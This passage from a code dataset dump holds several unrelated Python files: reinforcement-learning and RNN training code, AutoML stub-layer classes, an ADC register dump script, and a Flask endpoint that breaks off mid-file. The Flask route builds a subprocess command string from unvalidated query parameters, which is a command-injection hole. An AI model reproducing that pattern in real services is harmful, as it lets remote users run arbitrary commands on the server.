1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# self.SVGD_Network.eval()\n# actions = self.SVGD_Network.forward(state.double().unsqueeze(0), noise.double())\n# elif not training and particles:\n# low = T.full((1, self.n_particles, self.action_dim), -1.)\n# high = T.full((1, self.n_particles, self.action_dim), 1.)\n# dist = Uniform(low, high)\n# noise = dist.sample()\n# self.SVGD_Network.eval()\n# actions = self.SVGD_Network.forward(state.double().unsqueeze(0), noise.double())\n# return actions\n\n \n \n \n \n# ############################ LEARN ############################### \n# def learn(self, steps):\n# if self.memory.mem_cntr < self.batch_size:\n# return\n \n# # Sample a minibatch from the replay memory\n# state, action, reward, new_state, done = \\\n# self.memory.sample_buffer(self.batch_size)\n \n# # -------- Update the soft Q-function Parameters -------- #\n \n# # Converting the sampled experience to Tensors\n# state = T.tensor(state, dtype=T.float).to(self.SVGD_Network.device)\n# action = T.tensor(action, dtype=T.float).to(self.SVGD_Network.device)\n# reward = T.tensor(reward, dtype=T.float).to(self.SVGD_Network.device)\n# state_ = T.tensor(new_state, dtype=T.float).to(self.SVGD_Network.device)\n# done = T.tensor(done.astype(float)).to(self.SVGD_Network.device)\n \n# # for i in range(10):\n# # print('state : ', state[i].numpy().squeeze(), ' action : ', action[i].numpy().squeeze(), ' reward : ', reward[i].numpy().squeeze(), ' state_ : ', state_[i].numpy().squeeze())\n \n# # Sample actions for next states (state_) (bs, np, ad)\n# #action_, dist = self.choose_action_uniform(state_)\n# action_ = self.get_action_svgd(state, training=True, particles=True)\n \n# # Calculate the Q-value using the Q-network for next states (state_) (bs, np, 1)\n# Q_soft_ = self.get_Q_value(state_, action_, training=True, particles=True)\n# print(Q_soft_)\n \n \n# # Equation 10 \n# V_soft_ = T.logsumexp(Q_soft_, dim=1)\n# V_soft_ += self.action_dim * T.log(T.tensor([2.]))\n \n \n# # Evaluate Q hat in Equation 11\n# with T.no_grad():\n# Q_soft_hat = self.reward_scale * reward.unsqueeze(-1) + self.gamma * (1 - done.unsqueeze(-1)) * V_soft_ # (bs, 1)\n \n# # Calculate the Q-value using the Q-network for current states (state) \n# Q_soft = self.get_Q_value(state, action, training=True, particles=False) # (bs, np)\n\n\n# # Equation 11 \n# l2 = 0.0\n# for p in self.Q_Network.parameters():\n# l2 = l2 + p.norm(2)\n# J_Q = 0.5 * T.mean((Q_soft_hat - Q_soft) ** 2, dim=0) + l2\n \n# print(J_Q)\n \n# # Update Q Network \n# Q_network_loss = J_Q\n# self.Q_Network.optimizer.zero_grad()\n# Q_network_loss.backward()\n# self.Q_Network.optimizer.step()\n \n# # -------- Update The Policy -------- #\n \n# if steps%30 == 0:\n# # Compute aciton \n# action_svgd = self.get_action_svgd(state, training=True, particles=True) # (bs, np, ad)\n# #print('action_svgd', action_svgd)\n# #print(state)\n# svgd_Q_soft = self.get_Q_value(state, action_svgd, training=True, particles=True) # (bs, np, 1)\n# # print('action_svgd : ', action_svgd.squeeze(-1))\n# # print('svgd_Q_soft : ', svgd_Q_soft)\n \n# squash_correction = T.sum(T.log(1 - action_svgd**2 + 1e-6), dim=-1)\n# svgd_Q_soft = T.add(svgd_Q_soft, squash_correction.unsqueeze(-1))\n \n \n# # Get the Gradients of the energy with respect to x and y\n# grad_score = T.autograd.grad(svgd_Q_soft.sum(), action_svgd)[0].squeeze(-1)\n \n# # Compute the similarity using the RBF kernel \n# # kappa grad_kappa= T.empty(1)\n# # for i in range(self.batch_size): \n# kappa, grad_kappa = self.rbf_kernel(input_1=action_svgd, input_2=action_svgd) # (bs, np, ad)\n \n \n \n# l2 = 0.0\n# for p in self.SVGD_Network.parameters():\n# l2 = l2 + p.norm(2)\n# svgd = T.sum(kappa * grad_score.unsqueeze(2) + grad_kappa, dim=1) / self.n_particles - l2 # (bs, np * ad)\n# #print('svgd : ' ,svgd)\n# self.SVGD_Network.optimizer.zero_grad()\n# T.autograd.backward(-action_svgd, grad_tensors=svgd)\n# self.SVGD_Network.optimizer.step() \n \n \n \n \n \n \n \n \n ","sub_path":"archive/varsion 3_/SQL_torch.py","file_name":"SQL_torch.py","file_ext":"py","file_size_in_byte":18157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"210109502","text":"################################################################################\n# MIT License\n#\n# Copyright (c) 2019\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to conditions.\n#\n# Author: Deep Learning Course | Fall 2019\n# Date Created: 2019-09-06\n################################################################################\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\n\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nsys.path.append(\"..\")\n\nfrom part1.dataset import PalindromeDataset\nfrom part1.vanilla_rnn import VanillaRNN\nfrom part1.lstm import LSTM\n\n\n# You may want to look into tensorboard for logging\n# from torch.utils.tensorboard import SummaryWriter\n\n################################################################################\n\ndef train(config):\n # Initialize the device which to run the model on\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n config.input_length = 10\n\n # Initialize the model that we are going to use\n model_rnn = VanillaRNN(seq_length=config.input_length,\n input_dim=config.input_dim,\n num_hidden=config.num_hidden,\n num_classes=config.num_classes,\n device=device)\n\n model_lstm = LSTM(seq_length=config.input_length,\n input_dim=config.input_dim,\n num_hidden=config.num_hidden,\n num_classes=config.num_classes,\n device=device)\n\n # Initialize the dataset and data loader (note the +1)\n dataset = PalindromeDataset(config.input_length + 1)\n data_loader = DataLoader(dataset, 1, num_workers=1)\n\n # Setup the loss and optimizer\n criterion = nn.CrossEntropyLoss()\n input, targets = next(iter(data_loader))\n\n for model in [model_rnn, model_lstm]:\n preds = model(input)\n criterion(preds, targets).backward()\n\n norms = [h.grad.norm() for h in model.hs]\n plt.plot(norms, label=f\"{str(model)[:-2]}\")\n\n plt.legend()\n plt.savefig(\"gradients.png\")\n plt.show()\n\n\n################################################################################\n################################################################################\n\nif __name__ == \"__main__\":\n torch.manual_seed(43)\n # Parse training configuration\n parser = argparse.ArgumentParser()\n\n # Model params\n parser.add_argument('--model_type', type=str, default=\"RNN\", help=\"Model type, should be 'RNN' or 'LSTM'\")\n parser.add_argument('--input_length', type=int, default=10, help='Length of an input sequence')\n parser.add_argument('--input_dim', type=int, default=1, help='Dimensionality of input sequence')\n parser.add_argument('--num_classes', type=int, default=10, help='Dimensionality of output sequence')\n parser.add_argument('--num_hidden', type=int, default=128, help='Number of hidden units in the model')\n parser.add_argument('--batch_size', type=int, default=128, help='Number of examples to process in a batch')\n parser.add_argument('--learning_rate', type=float, default=0.001, help='Learning rate')\n parser.add_argument('--train_steps', type=int, default=10000, help='Number of training steps')\n parser.add_argument('--max_norm', type=float, default=10.0)\n parser.add_argument('--device', type=str, default=\"cuda:0\", help=\"Training device 'cpu' or 'cuda:0'\")\n\n config = parser.parse_args()\n\n # Train the model\n train(config)\n","sub_path":"assignment2/part1/grads_over_time.py","file_name":"grads_over_time.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"424336618","text":"# -*- coding: UTF-8 -*-\n# @Time : 2018/12/18 12:14 PM\n# @File : basestublayers.py\n# @Author : jian\nfrom __future__ import division\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom antgo.automl.stublayer import *\nimport numpy as np\n\n\nclass BaseStubWeightBiasLayer(StubLayer):\n def import_weights(self, layer):\n pass\n\n def export_weights(self, layer):\n pass\n\n\nclass BaseStubDense(BaseStubWeightBiasLayer):\n def __init__(self, input_units, units, input=None, output=None, **kwargs):\n super(BaseStubDense, self).__init__(input, output, **kwargs)\n self.input_units = input_units\n self.units = units\n self.layer_type = 'dense'\n self.layer_name = 'dense'\n self.layer_width = units\n\n @property\n def output_shape(self):\n return self.units,\n\n def size(self):\n return self.input_units * self.units + self.units\n\n def flops(self):\n return self.input.shape[-1] * self.units + (self.input.shape[-1] - 1) + self.units\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.dense(self.input_units, self.units, block_name=self.block_name, cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubConv2d(BaseStubWeightBiasLayer):\n def __init__(self, input_channel, filters, kernel_size_h, kernel_size_w, rate_h=1, rate_w=1, stride=1, input=None, output=None, **kwargs):\n super(BaseStubConv2d, self).__init__(input, output, **kwargs)\n self.input_channel = input_channel\n self.filters = filters\n self.kernel_size_h = kernel_size_h\n self.kernel_size_w = kernel_size_w\n self.rate_h = rate_h\n self.rate_w = rate_w\n self.stride = stride\n self.layer_type = 'conv2d'\n self.layer_name = 'conv2d'\n self.layer_width = filters\n self.n_dim = 2\n assert(stride == 1)\n\n @property\n def output_shape(self):\n ret = (self.input.shape[0],)\n for dim in self.input.shape[1:-1]:\n ret = ret + (max(int(dim / self.stride), 1),)\n\n ret = ret + (self.filters,)\n return ret\n\n def size(self):\n return self.filters * self.kernel_size_h * self.kernel_size_w * self.input_channel + self.filters\n\n def flops(self):\n n = self.input.shape[-1] * self.kernel_size_h * self.kernel_size_w # vector_length\n flops_per_instance = n + (n - 1) # general defination for number of flops (n: multiplications and n-1: additions)\n num_instances_per_filter = ((self.input.shape[1] - self.kernel_size_h + self.kernel_size_h / 2) / self.stride) + 1 # for rows\n num_instances_per_filter *= ((self.input.shape[2] - self.kernel_size_w + self.kernel_size_w / 2) / self.stride) + 1 # multiplying with cols\n\n flops_per_filter = num_instances_per_filter * flops_per_instance\n total_flops_per_layer = flops_per_filter * self.filters # multiply with number of filters\n\n return total_flops_per_layer\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.conv2d(self.input_channel,\n self.filters,\n self.kernel_size_h,\n self.kernel_size_w,\n self.rate_h,\n self.rate_w,\n self.stride,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubSeparableConv2d(BaseStubWeightBiasLayer):\n def __init__(self, input_channel, filters, kernel_size_h, kernel_size_w, rate_h=1, rate_w=1, stride=1, input=None, output=None, **kwargs):\n super(BaseStubSeparableConv2d, self).__init__(input, output, **kwargs)\n self.input_channel = input_channel\n self.filters = filters\n self.kernel_size_h = kernel_size_h\n self.kernel_size_w = kernel_size_w\n self.rate_h = rate_h\n self.rate_w = rate_w\n self.stride = stride\n self.layer_type = 'conv2d'\n self.layer_name = 'separable_conv2d'\n self.layer_width = filters\n self.n_dim = 2\n assert(stride == 1)\n\n @property\n def output_shape(self):\n ret = (self.input.shape[0],)\n for dim in self.input.shape[1:-1]:\n ret = ret + (max(int(dim / self.stride), 1),)\n\n ret = ret + (self.filters,)\n return ret\n\n def size(self):\n return self.filters * self.kernel_size_h * self.kernel_size_w*self.input_channel + self.filters\n\n def flops(self):\n # 1.step depthwise convolution\n n = 1 * self.kernel_size_h * self.kernel_size_w # vector_length\n flops_per_instance_step_1 = n + (n - 1) # general defination for number of flops (n: multiplications and n-1: additions)\n num_instances_per_filter = ((self.input.shape[1] - self.kernel_size_h + self.kernel_size_h / 2) / self.stride) + 1 # for rows\n num_instances_per_filter *= ((self.input.shape[2] - self.kernel_size_w + self.kernel_size_w / 2) / self.stride) + 1 # multiplying with cols\n\n flops_per_filter_step_1 = num_instances_per_filter * flops_per_instance_step_1\n total_flops_per_layer_step_1 = flops_per_filter_step_1 * self.filters # multiply with number of filters\n\n # 2.step pointwise convolution\n n = self.input.shape[-1] * 1 * 1\n flops_per_instance_step_2 = n + (n - 1)\n flops_per_filter_step_2 = num_instances_per_filter * flops_per_instance_step_2\n total_flops_per_layer_step_2 = flops_per_filter_step_2 * self.filters # multiply with number of filters\n\n return total_flops_per_layer_step_1+total_flops_per_layer_step_2\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.separable_conv2d(self.input_channel,\n self.filters,\n self.kernel_size_h,\n self.kernel_size_w,\n self.rate_h,\n self.rate_w,\n self.stride,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubIdentity(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubIdentity, self).__init__(input, output,**kwargs)\n\n @property\n def output_shape(self):\n return self.input.shape\n\n def size(self):\n return 0\n\n def flops(self):\n return 0.0\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.identity(\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubSPP(BaseStubWeightBiasLayer):\n def __init__(self, grid_h, grid_w, input=None, output=None, **kwargs):\n super(BaseStubSPP, self).__init__(input, output, **kwargs)\n self.grid_h = grid_h\n self.grid_w = grid_w\n self.layer_type = 'spp'\n self.layer_name = 'spp'\n\n @property\n def output_shape(self):\n return self.input.shape\n\n def size(self):\n return 0\n\n def flops(self):\n # 1.step average pooling\n flops_per_instance_step_1 = self.grid_h*self.grid_w\n operates = ((self.input.shape[1] - self.grid_h + self.grid_h / 2) / self.grid_h) + 1\n operates *= ((self.input.shape[2] - self.grid_w + self.grid_w / 2) / self.grid_w) + 1\n flops_step_1 = operates * flops_per_instance_step_1 * self.input.shape[3]\n\n # 2.step 1x1 convolution\n n = self.input.shape[3] * 1 * 1\n flops_step_2 = operates * (n + (n - 1)) * self.input.shape[3] # multiply with number of filters\n\n # 3.step bilinear resize\n flops_step_3 = self.input.shape[1] * self.input.shape[2] * self.input.shape[3] * 7\n\n return flops_step_1 + flops_step_2 + flops_step_3\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.spp(self.grid_h,\n self.grid_w,\n self.input,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubConcatenate(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n if input is None:\n input = []\n super(BaseStubConcatenate, self).__init__(input, output, **kwargs)\n self.layer_type = 'concat'\n self.layer_name = 'concat'\n\n @property\n def output_shape(self):\n ret = 0\n for current_input in self.input:\n ret += current_input.shape[-1]\n ret = tuple(self.input[0].shape[:-1]) + (ret,)\n return ret\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.concat(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubAdd(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubAdd, self).__init__(input, output, **kwargs)\n self.layer_type = 'add'\n self.layer_name = 'add'\n\n @property\n def output_shape(self):\n return self.input[0].shape\n\n def flops(self):\n return self.input[0].shape[1] * self.input[0].shape[2] * self.input[0].shape[3] - 1\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.add(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubDot(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubDot, self).__init__(input, output, **kwargs)\n self.layer_type = 'dot'\n self.layer_name = 'dot'\n\n @property\n def output_shape(self):\n return self.input[0].shape\n\n def flops(self):\n return self.input[0].shape[1] * self.input[0].shape[2] * self.input[0].shape[3] - 1\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.dot(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\n\nclass BaseStubFlatten(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubFlatten, self).__init__(input, output, **kwargs)\n self.layer_type = 'flatten'\n self.layer_name = 'flatten'\n\n @property\n def output_shape(self):\n ret = 1\n for dim in self.input.shape:\n ret *= dim\n return ret,\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.flatten(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubReLU(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubReLU, self).__init__(input, output, **kwargs)\n self.layer_type = 'relu'\n self.layer_name = 'relu'\n\n def flops(self):\n return self.input.shape[1] * self.input.shape[2] * self.input.shape[3]\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.relu(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubReLU6(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubReLU6, self).__init__(input, output, **kwargs)\n self.layer_type = 'relu6'\n self.layer_name = 'relu6'\n\n def flops(self):\n return self.input.shape[1] * self.input.shape[2] * self.input.shape[3]\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.relu6(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubSoftmax(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubSoftmax, self).__init__(input, output, **kwargs)\n self.layer_type = 'softmax'\n self.layer_name = 'softmax'\n\n def flops(self):\n return 0\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.softmax(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubSigmoid(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubSigmoid, self).__init__(input, output, **kwargs)\n self.layer_type = 'sigmoid'\n self.layer_name = 'sigmoid'\n\n def flops(self):\n return 0\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.sigmoid(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubPooling(StubLayer):\n def __init__(self, kernel_size_h=2, kernel_size_w=2, input=None, output=None, **kwargs):\n super(BaseStubPooling, self).__init__(input, output, **kwargs)\n self.kernel_size_h = kernel_size_h\n self.kernel_size_w = kernel_size_w\n self.is_spatial_change = True\n self.layer_type = 'pool2d'\n\n @property\n def output_shape(self):\n ret = (self.input.shape[0],)\n ret = ret + (max(int(self.input.shape[1] / self.kernel_size_h), 1),)\n ret = ret + (max(int(self.input.shape[2] / self.kernel_size_w), 1),)\n ret = ret + (self.input.shape[-1],)\n return ret\n\n\nclass BaseStubAvgPooling2d(BaseStubPooling):\n def __init__(self, kernel_size_h=2, kernel_size_w=2, input=None, output=None, **kwargs):\n super(BaseStubAvgPooling2d, self).__init__(kernel_size_h, kernel_size_w, input, output, **kwargs)\n self.layer_name = 'avg_pool2d'\n\n def flops(self):\n flops_per_instance_step_1 = self.kernel_size_h*self.kernel_size_w\n operates = ((self.input.shape[1] - self.kernel_size_h + self.kernel_size_h / 2) / self.kernel_size_h) + 1\n operates *= ((self.input.shape[2] - self.kernel_size_w + self.kernel_size_w / 2) / self.kernel_size_w) + 1\n total_flops = operates * flops_per_instance_step_1 * self.input.shape[3]\n\n return total_flops\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.avg_pool2d(self.kernel_size_h,\n self.kernel_size_w,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubMaxPooling2d(BaseStubPooling):\n def __init__(self, kernel_size_h=2, kernel_size_w=2, input=None, output=None, **kwargs):\n super(BaseStubMaxPooling2d, self).__init__(kernel_size_h, kernel_size_w, input, output, **kwargs)\n self.layer_name = 'max_pool2d'\n\n def flops(self):\n flops_per_instance_step_1 = self.kernel_size_h * self.kernel_size_w\n operates = ((self.input.shape[1] - self.kernel_size_h + self.kernel_size_h / 2) / self.kernel_size_h) + 1\n operates *= ((self.input.shape[2] - self.kernel_size_w + self.kernel_size_w / 2) / self.kernel_size_w) + 1\n total_flops = operates * flops_per_instance_step_1 * self.input.shape[3]\n\n return total_flops\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.max_pool2d(self.kernel_size_h,\n self.kernel_size_w,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubGlobalPooling(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubGlobalPooling, self).__init__(input, output, **kwargs)\n self.layer_type = 'global_pool2d'\n\n @property\n def output_shape(self):\n return (self.input.shape[0], 1, 1, self.input.shape[-1])\n\n\nclass BaseStubGlobalPooling2d(BaseStubGlobalPooling):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubGlobalPooling2d, self).__init__(input, output, **kwargs)\n self.layer_name = 'global_pool2d'\n\n def flops(self):\n return self.input.shape[1] * self.input.shape[2] * self.input.shape[3]\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.global_pool2d(block_name=self.block_name, cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubDropout(StubLayer):\n def __init__(self, rate, input=None, output=None, **kwargs):\n super(BaseStubDropout, self).__init__(input, output, **kwargs)\n self.rate = rate\n self.layer_type = 'dropout'\n\n\nclass BaseStubDropout2d(BaseStubDropout):\n def __init__(self, rate, input=None, output=None, **kwargs):\n super(BaseStubDropout2d, self).__init__(rate, input, output, **kwargs)\n self.layer_name = 'dropout_2d'\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.dropout_2d(self.rate,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubInput(StubLayer):\n def __init__(self, shape, input=None, output=None, **kwargs):\n super(BaseStubInput, self).__init__(input, output, **kwargs)\n self.shape = shape\n self.layer_type = 'placeholder'\n self.layer_name = 'input'\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.input(self.shape)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubBatchNormalization2d(StubLayer):\n def __init__(self, input=None, output=None, **kwargs):\n super(BaseStubBatchNormalization2d, self).__init__(input, output, **kwargs)\n self.layer_type = 'bn'\n self.layer_name = 'bn2d'\n self.n_dim = 2\n\n def flops(self):\n return self.input.shape[1]*self.input.shape[2]*self.input.shape[3]*2\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.bn2d(block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseStubBilinearResize(StubLayer):\n def __init__(self, height, width, input=None, output=None, **kwargs):\n super(BaseStubBilinearResize, self).__init__(input, output, **kwargs)\n self.height = height\n self.width = width\n self.layer_type = 'resize'\n self.layer_name = 'bilinear_resize'\n\n @property\n def output_shape(self):\n return (self.input.shape[0], self.height, self.width, self.input.shape[-1])\n\n def flops(self):\n return self.input.shape[1] * self.input.shape[2] * self.input.shape[3] * 7\n\n def __call__(self, *args, **kwargs):\n if self.layer_factory is not None:\n layer = self.layer_factory.bilinear_resize(self.height,\n self.width,\n block_name=self.block_name,\n cell_name=self.cell_name)\n return layer(*args, **kwargs)\n\n raise NotImplementedError\n\n\nclass BaseLayerFactory(object):\n def __init__(self):\n pass\n\n def __getattr__(self, item):\n if item not in ['dense',\n 'conv2d',\n 'separable_conv2d',\n 'concat',\n 'add',\n 'dot',\n 'avg_pool2d',\n 'max_pool2d',\n 'global_pool2d',\n 'relu',\n 'flatten',\n 'relu6',\n 'bn2d',\n 'softmax',\n 'sigmoid',\n 'dropout_2d',\n 'bilinear_resize',\n 'spp',\n 'identity',\n 'input']:\n return getattr(super(BaseLayerFactory, self), item)\n\n def func(*args, **kwargs):\n if item == 'dense':\n return BaseStubDense(*args, **kwargs)\n elif item == 'conv2d':\n return BaseStubConv2d(*args, **kwargs)\n elif item == 'separable_conv2d':\n return BaseStubSeparableConv2d(*args, **kwargs)\n elif item == 'spp':\n return BaseStubSPP(*args, **kwargs)\n elif item == 'concat':\n return BaseStubConcatenate(*args, **kwargs)\n elif item == 'add':\n return BaseStubAdd(*args, **kwargs)\n elif item == 'dot':\n return BaseStubDot(*args, **kwargs)\n elif item == 'avg_pool2d':\n return BaseStubAvgPooling2d(*args, **kwargs)\n elif item == 'max_pool2d':\n return BaseStubMaxPooling2d(*args, **kwargs)\n elif item == 'global_pool2d':\n return BaseStubGlobalPooling2d(*args, **kwargs)\n elif item == 'relu':\n return BaseStubReLU(*args, **kwargs)\n elif item == 'relu6':\n return BaseStubReLU6(*args, **kwargs)\n elif item == 'flatten':\n return BaseStubFlatten(*args, **kwargs)\n elif item == 'bn2d':\n return BaseStubBatchNormalization2d(*args, **kwargs)\n elif item == 'softmax':\n return BaseStubSoftmax(*args, **kwargs)\n elif item == 'sigmoid':\n return BaseStubSigmoid(*args, **kwargs)\n elif item == 'dropout_2d':\n return BaseStubDropout2d(*args, **kwargs)\n elif item == 'bilinear_resize':\n return BaseStubBilinearResize(*args, **kwargs)\n elif item == 'identity':\n return BaseStubIdentity(*args, **kwargs)\n elif item == 'input':\n return BaseStubInput(*args, **kwargs)\n\n return func\n","sub_path":"antgo/automl/basestublayers.py","file_name":"basestublayers.py","file_ext":"py","file_size_in_byte":22360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"57199229","text":"#!/usr/bin/python3\n\nfrom uio import Uio\nimport ctypes\nfrom ctypes import c_uint32 as uint\nfrom ctypes import c_byte as byte\n\n########## ADC #####################################\n#\n# This will test the ADC Status Register\n# Adapted from zmatt's l3-sn-test.py\nfrom ctypes import Structure\n\nclass IterableStructure(Structure):\n def __getitem__(self, i):\n if not isinstance(i, int):\n raise TypeError('subindices must be integers: %r' % i)\n return getattr(self, self._fields_[i][0])\n\nadc = Uio( \"adc\" )\nclass Step( IterableStructure ):\n _fields_ = [\n (\"stepconfig\", uint, 32),\n (\"stepdelay\", uint, 32),\n ];\nclass ADC( IterableStructure ):\n _fields_ = [\n (\"revision\", uint, 32),\n (\"spacer01\", byte*(0x10-4)),\n (\"sysconfig\", uint, 32),\n (\"spacer02\", byte*16),\n (\"irqstatus_raw\", uint, 32),\n (\"irqstatus\", uint, 32),\n (\"irqenable_set\", uint, 32),\n (\"irqenable_clr\", uint, 32),\n (\"irqwakeup\", uint, 32),\n (\"dmaenable_set\", uint, 32),\n (\"dmaenable_clr\", uint, 32),\n (\"ctrl\", uint, 32),\n (\"adcstat\", uint, 32),\n (\"adcrange\", uint, 32),\n (\"adc_clkdiv\", uint, 32),\n (\"adc_misc\", uint, 32),\n (\"stepenable\", uint, 32),\n (\"idleconfig\", uint, 32),\n (\"ts_charge_stepconfig\", uint, 32),\n (\"ts_charge_delay\", uint, 32),\n (\"steps\", Step*16),\n (\"fifo0count\", uint, 32),\n (\"fifo0threshold\", uint, 32),\n (\"dma0req\", uint, 32),\n (\"fifo1count\", uint, 32),\n (\"fifo1threshold\", uint, 32),\n (\"dma1req\", uint, 32),\n (\"spacer03\", byte*4),\n (\"fifo0data\", uint, 32),\n (\"spacer04\", byte*0xFC),\n (\"fifo1data\", uint, 32)\n ];\ntestStatus = adc.map(ADC)\ni = 0\nfor x in testStatus:\n# if ( i % 5 == 0):\n# input(\"Press Enter to Continue:\")\n if isinstance(x, int):\n print(hex(i), \": \", format(x, '0{0}b'.format(32)), end=\"\")\n i = i + 4\n if hasattr(x, \"__len__\"):\n for x2 in x:\n if isinstance(x2, Step):\n for x3 in x2:\n if isinstance(x3, int):\n print(hex(i), \": \", format(x3, '0{0}b'.format(32)))\n i = i + 4\n else:\n print(hex(i), \": \" , \"BUFFER: \", x2.__sizeof__())\n i = i + 1\n# if (i % 5 == 0):\n# input(\"Press Enter to Continue:\")\n else:\n print(\"<\")\n","sub_path":"adc-test.py","file_name":"adc-test.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"9183083","text":"from flask import Flask, jsonify, request\nfrom flask_cors import CORS, cross_origin\nimport pandas as pd\nimport numpy as np\nimport subprocess\nimport json\n\n\napp = Flask(__name__)\n\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n@app.route('/da', methods=['GET'])\n@cross_origin()\ndef process():\n print(request.args)\n option1 = request.args.get(\"sele1\")\n option2 = request.args.get(\"sele2\")\n option3 = request.args.get(\"tipo\")\n option2 = option2.replace(' ', '_')\n print(option1)\n print(option2)\n print(option3)\n\n if(option2 == \"Avenida_Padre_Julio_Fragata\"):\n option2 = \"padre_julio_fragata\"\n subprocess.call('python LSTM_model.py ' + option3 + ' ' + option1 + ' ' + option2)\n if(option2 == \"S._Vitor\" and option3 == \"curto\"):\n print(\"Entrei\")\n option2 = \"svitor\"\n if(option2 == \"S._Vitor\" and option3 == \"longo\"):\n option2 = \"svitor\"\n\n csvp = \"prediction\" + option2 + \"curto\" + \".csv\"\n\n data = pd.read_csv(csvp)\n\n data = data.reset_index().to_json(orient='records')\n\n print(data)\n\n\n #data.drop([\"Atual\"],axis=1, inplace=True)\n #print(data)\n 